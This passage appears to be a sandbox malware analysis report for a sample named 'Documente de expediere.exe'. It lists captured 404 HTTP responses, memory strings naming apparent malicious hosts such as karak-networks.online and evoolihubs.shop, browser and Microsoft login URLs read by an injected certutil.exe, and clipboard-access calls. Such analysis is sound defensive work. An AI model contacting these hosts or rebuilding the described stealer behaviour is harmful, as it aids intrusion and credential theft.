6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:46:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:46:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:46:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:46:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
            Source: QAWHbhvedb.exe, 0000000F.00000002.3716040439.0000000004FD8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.karak-networks.online
            Source: QAWHbhvedb.exe, 0000000F.00000002.3716040439.0000000004FD8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.karak-networks.online/2afv/
            Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oa
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: certutil.exe, 0000000E.00000002.3705861434.000000000361C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: certutil.exe, 0000000E.00000003.1781637570.00000000086C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c
            Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: certutil.exe, 0000000E.00000002.3715079219.0000000006960000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000003890000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN
            Source: certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
            Source: certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0070425A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00704458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00704458
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0070425A
